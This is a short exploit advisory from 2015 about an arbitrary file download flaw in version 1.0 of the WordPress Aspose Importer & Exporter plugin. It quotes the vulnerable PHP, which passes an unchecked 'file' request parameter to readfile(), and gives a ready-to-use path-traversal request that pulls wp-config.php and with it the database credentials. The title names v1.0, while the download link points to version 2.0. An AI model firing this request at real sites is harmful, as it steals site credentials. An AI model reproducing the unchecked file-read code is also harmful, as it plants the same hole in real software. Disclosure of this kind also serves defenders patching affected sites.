WordPress Aspose Importer and Exporter plugin version 1.0 suffers from an arbitrary file download vulnerability.
8be70304bc73a2fce09d3c01c02b74c8a0d4d802ca303d85456977cb45bd45c8
#########################################
Exploit Title : Wordpress Aspose Importer & Exporter v1.0 Plugin File
Download Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/
Download Link :
https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip
Date : 28 / 3 / 2015
Tested On : windows 8.1 + linux Kali
#########################################
#########################################
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>
Exploit:
Vulnerable file :
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>
Vulnerable Code :
<?php
if(isset($_GET['file'])) {
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
}
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File
Address]
Examples :
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
#########################################
#########################################
Discovered by : Rq07
#########################################